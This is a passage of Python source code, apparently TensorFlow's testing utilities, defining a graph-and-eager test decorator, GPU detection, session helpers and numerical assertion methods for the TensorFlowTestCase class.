This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the
session when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and setUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/cpu:0"):
f(self, **kwargs)
else:
f(self, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
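# Hedged sketch of how the capability check above behaves: compute
# capabilities compare as (major, minor) tuples, so a requirement of (3, 5)
# is met by (3, 7) or (6, 0) but not by (3, 0). The call below is
# illustrative only and returns True only on a machine with such a GPU.
def _example_gpu_check():
  return is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5))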
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
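# Minimal usage sketch for the device() helper above: anything built inside
# the context is placed on GPU:0 when one is available, otherwise on CPU:0.
def _example_device_usage():
  with device(use_gpu=True):
    return ops.convert_to_tensor([1.0, 2.0])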
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run().
"""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
logging.error(str(e))
raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that tests in different runs cannot pollute each
other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is the same as the parsed expected_message_maybe_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
the numpy values of `tensors`.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
sess = self._create_session(graph, config, use_gpu, force_gpu)
with self._constrain_devices_and_set_default(
sess, use_gpu, force_gpu) as constrained_sess:
# We need to do this to make sure the session closes, otherwise, even
# if the user does with self.session():, it will not close the session.
with constrained_sess:
yield constrained_sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
with self._get_cached_session(
graph, config, use_gpu, force_gpu,
crash_if_inconsistent_args=True) as sess:
yield sess
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
with self._get_cached_session(
graph, config, use_gpu, force_gpu,
crash_if_inconsistent_args=False) as sess:
yield sess
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Checks that the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
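# Hedged usage sketch for checkedThread() above; the target function, queue
# variable, and test name are hypothetical:
#
#   def test_worker_thread(self):
#     t = self.checkedThread(target=my_worker_fn, args=(work_queue,))
#     t.start()
#     t.join()  # join() re-raises any exception from the thread as a failure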
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure
of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested structure
of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is relaxed to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays or Tensors do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if the
number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscript(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
